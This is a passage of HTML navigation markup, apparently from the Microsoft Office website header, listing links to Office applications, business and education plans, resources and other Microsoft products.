        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;FrontlineWorkers_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c5c2c3c8c2m1r1a1&quot;,&quot;sN&quot;:5,&quot;aN&quot;:&quot;c2c3c8c2m1r1a1&quot;}">
            <a id="FrontlineWorkers" class="js-subm-uhf-nav-link" href="https://products.office.com/business/enterprise-firstline-workers" data-m="{&quot;cN&quot;:&quot;CatNav_FrontlineWorkers_nav&quot;,&quot;id&quot;:&quot;n1c5c2c3c8c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c5c2c3c8c2m1r1a1&quot;}">Firstline workers</a>
            
        </li>
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;SeeAllBusiness_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c6c2c3c8c2m1r1a1&quot;,&quot;sN&quot;:6,&quot;aN&quot;:&quot;c2c3c8c2m1r1a1&quot;}">
            <a id="SeeAllBusiness" class="js-subm-uhf-nav-link" href="https://products.office.com/business/office" data-m="{&quot;cN&quot;:&quot;CatNav_SeeAllBusiness_nav&quot;,&quot;id&quot;:&quot;n1c6c2c3c8c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c6c2c3c8c2m1r1a1&quot;}">See all business</a>
            
        </li>
            </ul>
            
        </li>
        <li class="f-sub-menu js-nav-menu nested-menu" data-m="{&quot;cN&quot;:&quot;ForEducation_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c3c3c8c2m1r1a1&quot;,&quot;sN&quot;:3,&quot;aN&quot;:&quot;c3c8c2m1r1a1&quot;}">

            <button type="button" f-multi-parent="true" aria-expanded="false" data-m="{&quot;cN&quot;:&quot;CatNav_ForEducation_nonnav&quot;,&quot;id&quot;:&quot;nn1c3c3c8c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c3c3c8c2m1r1a1&quot;}">For education &gt;</button>
            <ul aria-hidden="true">
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;Studentsteachers_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c2c3c3c8c2m1r1a1&quot;,&quot;sN&quot;:2,&quot;aN&quot;:&quot;c3c3c8c2m1r1a1&quot;}">
            <a id="Studentsteachers" class="js-subm-uhf-nav-link" href="https://products.office.com/student/office-in-education" data-m="{&quot;cN&quot;:&quot;CatNav_Studentsteachers_nav&quot;,&quot;id&quot;:&quot;n1c2c3c3c8c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c2c3c3c8c2m1r1a1&quot;}">For students &amp; teachers</a>
            
        </li>
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;Schools_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c3c3c3c8c2m1r1a1&quot;,&quot;sN&quot;:3,&quot;aN&quot;:&quot;c3c3c8c2m1r1a1&quot;}">
            <a id="Schools" class="js-subm-uhf-nav-link" href="https://products.office.com/academic/compare-office-365-education-plans" data-m="{&quot;cN&quot;:&quot;CatNav_Schools_nav&quot;,&quot;id&quot;:&quot;n1c3c3c3c8c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c3c3c3c8c2m1r1a1&quot;}">For schools</a>
            
        </li>
            </ul>
            
        </li>
        <li class="f-sub-menu js-nav-menu nested-menu" data-m="{&quot;cN&quot;:&quot;applications_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c4c3c8c2m1r1a1&quot;,&quot;sN&quot;:4,&quot;aN&quot;:&quot;c3c8c2m1r1a1&quot;}">

            <button type="button" f-multi-parent="true" aria-expanded="false" data-m="{&quot;cN&quot;:&quot;CatNav_applications_nonnav&quot;,&quot;id&quot;:&quot;nn1c4c3c8c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c4c3c8c2m1r1a1&quot;}">Applications &gt;</button>
            <ul aria-hidden="true">
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;outlook_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c2c4c3c8c2m1r1a1&quot;,&quot;sN&quot;:2,&quot;aN&quot;:&quot;c4c3c8c2m1r1a1&quot;}">
            <a id="outlook" class="js-subm-uhf-nav-link" href="https://products.office.com/outlook/email-and-calendar-software-microsoft-outlook" data-m="{&quot;cN&quot;:&quot;CatNav_outlook_nav&quot;,&quot;id&quot;:&quot;n1c2c4c3c8c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c2c4c3c8c2m1r1a1&quot;}">Outlook</a>
            
        </li>
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;onedrive-for-business_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c3c4c3c8c2m1r1a1&quot;,&quot;sN&quot;:3,&quot;aN&quot;:&quot;c4c3c8c2m1r1a1&quot;}">
            <a id="onedrive-for-business" class="js-subm-uhf-nav-link" href="https://products.office.com/onedrive-for-business/online-cloud-storage" data-m="{&quot;cN&quot;:&quot;CatNav_onedrive-for-business_nav&quot;,&quot;id&quot;:&quot;n1c3c4c3c8c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c3c4c3c8c2m1r1a1&quot;}">OneDrive</a>
            
        </li>
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;word_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c4c4c3c8c2m1r1a1&quot;,&quot;sN&quot;:4,&quot;aN&quot;:&quot;c4c3c8c2m1r1a1&quot;}">
            <a id="word" class="js-subm-uhf-nav-link" href="https://products.office.com/word" data-m="{&quot;cN&quot;:&quot;CatNav_word_nav&quot;,&quot;id&quot;:&quot;n1c4c4c3c8c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c4c4c3c8c2m1r1a1&quot;}">Word</a>
            
        </li>
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;excel_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c5c4c3c8c2m1r1a1&quot;,&quot;sN&quot;:5,&quot;aN&quot;:&quot;c4c3c8c2m1r1a1&quot;}">
            <a id="excel" class="js-subm-uhf-nav-link" href="https://products.office.com/excel" data-m="{&quot;cN&quot;:&quot;CatNav_excel_nav&quot;,&quot;id&quot;:&quot;n1c5c4c3c8c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c5c4c3c8c2m1r1a1&quot;}">Excel</a>
            
        </li>
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;powerpoint_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c6c4c3c8c2m1r1a1&quot;,&quot;sN&quot;:6,&quot;aN&quot;:&quot;c4c3c8c2m1r1a1&quot;}">
            <a id="powerpoint" class="js-subm-uhf-nav-link" href="https://products.office.com/powerpoint" data-m="{&quot;cN&quot;:&quot;CatNav_powerpoint_nav&quot;,&quot;id&quot;:&quot;n1c6c4c3c8c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c6c4c3c8c2m1r1a1&quot;}">PowerPoint</a>
            
        </li>
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;onenote_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c7c4c3c8c2m1r1a1&quot;,&quot;sN&quot;:7,&quot;aN&quot;:&quot;c4c3c8c2m1r1a1&quot;}">
            <a id="onenote" class="js-subm-uhf-nav-link" href="https://products.office.com/onenote" data-m="{&quot;cN&quot;:&quot;CatNav_onenote_nav&quot;,&quot;id&quot;:&quot;n1c7c4c3c8c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c7c4c3c8c2m1r1a1&quot;}">OneNote</a>
            
        </li>
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;sharepoint_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c8c4c3c8c2m1r1a1&quot;,&quot;sN&quot;:8,&quot;aN&quot;:&quot;c4c3c8c2m1r1a1&quot;}">
            <a id="sharepoint" class="js-subm-uhf-nav-link" href="https://products.office.com/sharepoint/collaboration" data-m="{&quot;cN&quot;:&quot;CatNav_sharepoint_nav&quot;,&quot;id&quot;:&quot;n1c8c4c3c8c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c8c4c3c8c2m1r1a1&quot;}">SharePoint</a>
            
        </li>
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;microsoft-teams_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c9c4c3c8c2m1r1a1&quot;,&quot;sN&quot;:9,&quot;aN&quot;:&quot;c4c3c8c2m1r1a1&quot;}">
            <a id="microsoft-teams" class="js-subm-uhf-nav-link" href="https://products.office.com/microsoft-teams/group-chat-software" data-m="{&quot;cN&quot;:&quot;CatNav_microsoft-teams_nav&quot;,&quot;id&quot;:&quot;n1c9c4c3c8c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c9c4c3c8c2m1r1a1&quot;}">Microsoft Teams</a>
            
        </li>
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;see-all-office-products_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c10c4c3c8c2m1r1a1&quot;,&quot;sN&quot;:10,&quot;aN&quot;:&quot;c4c3c8c2m1r1a1&quot;}">
            <a id="see-all-office-products" class="js-subm-uhf-nav-link" href="https://products.office.com/products" data-m="{&quot;cN&quot;:&quot;CatNav_see-all-office-products_nav&quot;,&quot;id&quot;:&quot;n1c10c4c3c8c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c10c4c3c8c2m1r1a1&quot;}">See all Office products</a>
            
        </li>
            </ul>
            
        </li>
                                                    
                                </ul>
                            </div>
                        </li>                        <li class="nested-menu uhf-menu-item">
                            <div class="c-uhf-menu js-nav-menu">
                                <button type="button" id="resources" aria-expanded="false" data-m="{&quot;cN&quot;:&quot;CatNav_Resources_nonnav&quot;,&quot;id&quot;:&quot;nn4c8c2m1r1a1&quot;,&quot;sN&quot;:4,&quot;aN&quot;:&quot;c8c2m1r1a1&quot;}">Resources </button>

                                <ul class="" data-class-idn="" aria-hidden="true" data-m="{&quot;cN&quot;:&quot;Resources_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c5c8c2m1r1a1&quot;,&quot;sN&quot;:5,&quot;aN&quot;:&quot;c8c2m1r1a1&quot;}">
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;CustomerStories_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c1c5c8c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c5c8c2m1r1a1&quot;}">
            <a id="CustomerStories" class="js-subm-uhf-nav-link" href="https://products.office.com/business/office-365-customer-stories-office-testimonials" data-m="{&quot;cN&quot;:&quot;CatNav_CustomerStories_nav&quot;,&quot;id&quot;:&quot;n1c1c5c8c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c1c5c8c2m1r1a1&quot;}">Customer stories</a>
            
        </li>
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;FAQ_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c2c5c8c2m1r1a1&quot;,&quot;sN&quot;:2,&quot;aN&quot;:&quot;c5c8c2m1r1a1&quot;}">
            <a id="FAQ" class="js-subm-uhf-nav-link" href="https://products.office.com/microsoft-office-for-home-and-school-faq" data-m="{&quot;cN&quot;:&quot;CatNav_FAQ_nav&quot;,&quot;id&quot;:&quot;n1c2c5c8c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c2c5c8c2m1r1a1&quot;}">Frequently asked questions</a>
            
        </li>
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;InstallOffice_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c3c5c8c2m1r1a1&quot;,&quot;sN&quot;:3,&quot;aN&quot;:&quot;c5c8c2m1r1a1&quot;}">
            <a id="InstallOffice" class="js-subm-uhf-nav-link" href="https://go.microsoft.com/fwlink/p/?LinkID=717124" data-m="{&quot;cN&quot;:&quot;CatNav_InstallOffice_nav&quot;,&quot;id&quot;:&quot;n1c3c5c8c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c3c5c8c2m1r1a1&quot;}">Install Office</a>
            
        </li>
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;ITResources_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c4c5c8c2m1r1a1&quot;,&quot;sN&quot;:4,&quot;aN&quot;:&quot;c5c8c2m1r1a1&quot;}">
            <a id="ITResources" class="js-subm-uhf-nav-link" href="https://products.office.com/business/office-for-it-pros" data-m="{&quot;cN&quot;:&quot;CatNav_ITResources_nav&quot;,&quot;id&quot;:&quot;n1c4c5c8c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c4c5c8c2m1r1a1&quot;}">IT Pro resources</a>
            
        </li>
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;officeblog_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c5c5c8c2m1r1a1&quot;,&quot;sN&quot;:5,&quot;aN&quot;:&quot;c5c8c2m1r1a1&quot;}">
            <a id="officeblog" class="js-subm-uhf-nav-link" href="https://blogs.office.com/" data-m="{&quot;cN&quot;:&quot;CatNav_officeblog_nav&quot;,&quot;id&quot;:&quot;n1c5c5c8c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c5c5c8c2m1r1a1&quot;}">Office blog</a>
            
        </li>
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;SecurityCompliance_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c6c5c8c2m1r1a1&quot;,&quot;sN&quot;:6,&quot;aN&quot;:&quot;c5c8c2m1r1a1&quot;}">
            <a id="SecurityCompliance" class="js-subm-uhf-nav-link" href="https://products.office.com/business/office-365-trust-center-welcome" data-m="{&quot;cN&quot;:&quot;CatNav_SecurityCompliance_nav&quot;,&quot;id&quot;:&quot;n1c6c5c8c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c6c5c8c2m1r1a1&quot;}">Security &amp; compliance</a>
            
        </li>
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;SystemRequirements_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c7c5c8c2m1r1a1&quot;,&quot;sN&quot;:7,&quot;aN&quot;:&quot;c5c8c2m1r1a1&quot;}">
            <a id="SystemRequirements" class="js-subm-uhf-nav-link" href="https://products.office.com/office-system-requirements" data-m="{&quot;cN&quot;:&quot;CatNav_SystemRequirements_nav&quot;,&quot;id&quot;:&quot;n1c7c5c8c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c7c5c8c2m1r1a1&quot;}">System requirements</a>
            
        </li>
                                                    
                                </ul>
                            </div>
                        </li>                        <li class="single-link js-nav-menu uhf-menu-item">
                            <a id="c-shellmenu_33" class="c-uhf-nav-link" href="https://templates.office.com/" data-m="{&quot;cN&quot;:&quot;CatNav_cat-templates_nav&quot;,&quot;id&quot;:&quot;n6c8c2m1r1a1&quot;,&quot;sN&quot;:6,&quot;aN&quot;:&quot;c8c2m1r1a1&quot;}">Templates</a>
                        </li>
                        <li class="single-link js-nav-menu uhf-menu-item">
                            <a id="support" class="c-uhf-nav-link" href="https://support.office.com/" data-m="{&quot;cN&quot;:&quot;CatNav_Support_nav&quot;,&quot;id&quot;:&quot;n7c8c2m1r1a1&quot;,&quot;sN&quot;:7,&quot;aN&quot;:&quot;c8c2m1r1a1&quot;}">Support</a>
                        </li>
                        <li class="single-link js-nav-menu uhf-menu-item">
                            <a id="My account" class="c-uhf-nav-link" href="https://office.live.com/start/MyAccount.aspx" data-m="{&quot;cN&quot;:&quot;CatNav_My account_nav&quot;,&quot;id&quot;:&quot;n8c8c2m1r1a1&quot;,&quot;sN&quot;:8,&quot;aN&quot;:&quot;c8c2m1r1a1&quot;}">My account</a>
                        </li>


                <li id="overflow-menu" class="overflow-menu x-hidden uhf-menu-item">
                        <div class="c-uhf-menu js-nav-menu">
        <button data-m="{&quot;pid&quot;:&quot;More&quot;,&quot;id&quot;:&quot;nn9c8c2m1r1a1&quot;,&quot;sN&quot;:9,&quot;aN&quot;:&quot;c8c2m1r1a1&quot;}" type="button" aria-label="More" aria-expanded="false">More</button>
        <ul id="overflow-menu-list" aria-hidden="true" class="overflow-menu-list">
        </ul>
    </div>

                </li>
                                    <li class="single-link js-nav-menu" id="c-uhf-nav-cta">
                        <a class="c-uhf-nav-link" href=" https://products.office.com/compare-all-microsoft-office-products?tab=1" data-m="{&quot;cN&quot;:&quot;CatNav_cta_Buy Office 365_nav&quot;,&quot;id&quot;:&quot;n10c8c2m1r1a1&quot;,&quot;sN&quot;:10,&quot;aN&quot;:&quot;c8c2m1r1a1&quot;}">Buy Office 365</a>
                    </li>
            </ul>
            
        </nav>


            <div class="c-uhfh-actions" data-m="{&quot;cN&quot;:&quot;Header actions_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c9c2m1r1a1&quot;,&quot;sN&quot;:9,&quot;aN&quot;:&quot;c2m1r1a1&quot;}">
                <div class="wf-menu">        <nav id="uhf-c-nav" aria-label="All microsoft menu" data-m="{&quot;cN&quot;:&quot;GlobalNav_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c1c9c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c9c2m1r1a1&quot;}">
            <ul class="js-paddle-items">
                <li>
                    <div class="c-uhf-menu js-nav-menu">
                        <button type="button" class="c-button-logo all-ms-nav" aria-label="All Microsoft expand to see list of Microsoft products and services" aria-expanded="false" data-m="{&quot;cN&quot;:&quot;GlobalNav_More_nonnav&quot;,&quot;id&quot;:&quot;nn1c1c9c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c1c9c2m1r1a1&quot;}"> <span>All Microsoft</span></button>
                        <ul class="f-multi-column f-multi-column-6" aria-hidden="true" data-m="{&quot;cN&quot;:&quot;More_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:2,&quot;aN&quot;:&quot;c1c9c2m1r1a1&quot;}">
                                    <li class="c-w0-contr">
            <ul class="c-w0">
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;Office_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c1c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c2c1c9c2m1r1a1&quot;}">
            <a id="shellmenu_36" class="js-subm-uhf-nav-link" href="https://products.office.com/en-us/home" data-m="{&quot;cN&quot;:&quot;W0Nav_Office_nav&quot;,&quot;id&quot;:&quot;n1c1c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c1c2c1c9c2m1r1a1&quot;}">Office</a>
            
        </li>
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;Windows_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c2c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:2,&quot;aN&quot;:&quot;c2c1c9c2m1r1a1&quot;}">
            <a id="shellmenu_37" class="js-subm-uhf-nav-link" href="https://www.microsoft.com/en-us/windows/" data-m="{&quot;cN&quot;:&quot;W0Nav_Windows_nav&quot;,&quot;id&quot;:&quot;n1c2c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c2c2c1c9c2m1r1a1&quot;}">Windows</a>
            
        </li>
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;Surface_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c3c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:3,&quot;aN&quot;:&quot;c2c1c9c2m1r1a1&quot;}">
            <a id="shellmenu_38" class="js-subm-uhf-nav-link" href="https://www.microsoft.com/en-us/surface" data-m="{&quot;cN&quot;:&quot;W0Nav_Surface_nav&quot;,&quot;id&quot;:&quot;n1c3c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c3c2c1c9c2m1r1a1&quot;}">Surface</a>
            
        </li>
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;Xbox_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c4c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:4,&quot;aN&quot;:&quot;c2c1c9c2m1r1a1&quot;}">
            <a id="shellmenu_39" class="js-subm-uhf-nav-link" href="https://www.xbox.com/" data-m="{&quot;cN&quot;:&quot;W0Nav_Xbox_nav&quot;,&quot;id&quot;:&quot;n1c4c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c4c2c1c9c2m1r1a1&quot;}">Xbox</a>
            
        </li>
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;Deals_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c5c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:5,&quot;aN&quot;:&quot;c2c1c9c2m1r1a1&quot;}">
            <a id="shellmenu_40" class="js-subm-uhf-nav-link" href="https://www.microsoft.com/en-us/store/b/sale?icid=gm_nav_L0_salepage" data-m="{&quot;cN&quot;:&quot;W0Nav_Deals_nav&quot;,&quot;id&quot;:&quot;n1c5c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c5c2c1c9c2m1r1a1&quot;}">Deals</a>
            
        </li>
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;Support_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c6c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:6,&quot;aN&quot;:&quot;c2c1c9c2m1r1a1&quot;}">
            <a id="l1_support" class="js-subm-uhf-nav-link" href="https://support.microsoft.com/en-us" data-m="{&quot;cN&quot;:&quot;W0Nav_Support_nav&quot;,&quot;id&quot;:&quot;n1c6c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c6c2c1c9c2m1r1a1&quot;}">Support</a>
            
        </li>
            </ul>
        </li>

        <li class="f-sub-menu js-nav-menu nested-menu" data-m="{&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c7c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:7,&quot;aN&quot;:&quot;c2c1c9c2m1r1a1&quot;}">

            <button type="button" f-multi-parent="true" aria-expanded="false" data-m="{&quot;id&quot;:&quot;nn1c7c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c7c2c1c9c2m1r1a1&quot;}">Software</button>
            <ul aria-hidden="true">
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;More_Software_WindowsApps_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c2c7c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:2,&quot;aN&quot;:&quot;c7c2c1c9c2m1r1a1&quot;}">
            <a id="shellmenu_44" class="js-subm-uhf-nav-link" href="https://www.microsoft.com/en-us/windows/windows-10-apps" data-m="{&quot;cN&quot;:&quot;GlobalNav_More_Software_WindowsApps_nav&quot;,&quot;id&quot;:&quot;n1c2c7c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c2c7c2c1c9c2m1r1a1&quot;}">Windows apps</a>
            
        </li>
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;More_Software_OneDrive_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c3c7c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:3,&quot;aN&quot;:&quot;c7c2c1c9c2m1r1a1&quot;}">
            <a id="shellmenu_45" class="js-subm-uhf-nav-link" href="https://onedrive.live.com/about/en-us/" data-m="{&quot;cN&quot;:&quot;GlobalNav_More_Software_OneDrive_nav&quot;,&quot;id&quot;:&quot;n1c3c7c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c3c7c2c1c9c2m1r1a1&quot;}">OneDrive</a>
            
        </li>
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;More_Software_Outlook_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c4c7c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:4,&quot;aN&quot;:&quot;c7c2c1c9c2m1r1a1&quot;}">
            <a id="shellmenu_46" class="js-subm-uhf-nav-link" href="https://outlook.live.com/owa/" data-m="{&quot;cN&quot;:&quot;GlobalNav_More_Software_Outlook_nav&quot;,&quot;id&quot;:&quot;n1c4c7c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c4c7c2c1c9c2m1r1a1&quot;}">Outlook</a>
            
        </li>
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;More_Software_Skype_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c5c7c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:5,&quot;aN&quot;:&quot;c7c2c1c9c2m1r1a1&quot;}">
            <a id="shellmenu_47" class="js-subm-uhf-nav-link" href="https://www.skype.com/en/" data-m="{&quot;cN&quot;:&quot;GlobalNav_More_Software_Skype_nav&quot;,&quot;id&quot;:&quot;n1c5c7c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c5c7c2c1c9c2m1r1a1&quot;}">Skype</a>
            
        </li>
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;More_Software_OneNote_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c6c7c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:6,&quot;aN&quot;:&quot;c7c2c1c9c2m1r1a1&quot;}">
            <a id="shellmenu_48" class="js-subm-uhf-nav-link" href="https://www.onenote.com/" data-m="{&quot;cN&quot;:&quot;GlobalNav_More_Software_OneNote_nav&quot;,&quot;id&quot;:&quot;n1c6c7c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c6c7c2c1c9c2m1r1a1&quot;}">OneNote</a>
            
        </li>
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;microsoft edge_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c7c7c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:7,&quot;aN&quot;:&quot;c7c2c1c9c2m1r1a1&quot;}">
            <a id="shellmenu_49" class="js-subm-uhf-nav-link" href="https://www.microsoft.com/edge" data-m="{&quot;cN&quot;:&quot;GlobalNav_microsoft edge_nav&quot;,&quot;id&quot;:&quot;n1c7c7c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c7c7c2c1c9c2m1r1a1&quot;}">Microsoft Edge</a>
            
        </li>
            </ul>
            
        </li>
        <li class="f-sub-menu js-nav-menu nested-menu" data-m="{&quot;cN&quot;:&quot;PCsAndDevices_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c8c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:8,&quot;aN&quot;:&quot;c2c1c9c2m1r1a1&quot;}">

            <button type="button" f-multi-parent="true" aria-expanded="false" data-m="{&quot;cN&quot;:&quot;GlobalNav_PCsAndDevices_nonnav&quot;,&quot;id&quot;:&quot;nn1c8c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c8c2c1c9c2m1r1a1&quot;}">PCs &amp; Devices  </button>
            <ul aria-hidden="true">
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;More_PCsAndDevices_PCsAndTablets_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c2c8c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:2,&quot;aN&quot;:&quot;c8c2c1c9c2m1r1a1&quot;}">
            <a id="shellmenu_51" class="js-subm-uhf-nav-link" href="https://www.microsoft.com/en-us/windows/devices" data-m="{&quot;cN&quot;:&quot;GlobalNav_More_PCsAndDevices_PCsAndTablets_nav&quot;,&quot;id&quot;:&quot;n1c2c8c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c2c8c2c1c9c2m1r1a1&quot;}">PCs &amp; tablets</a>
            
        </li>
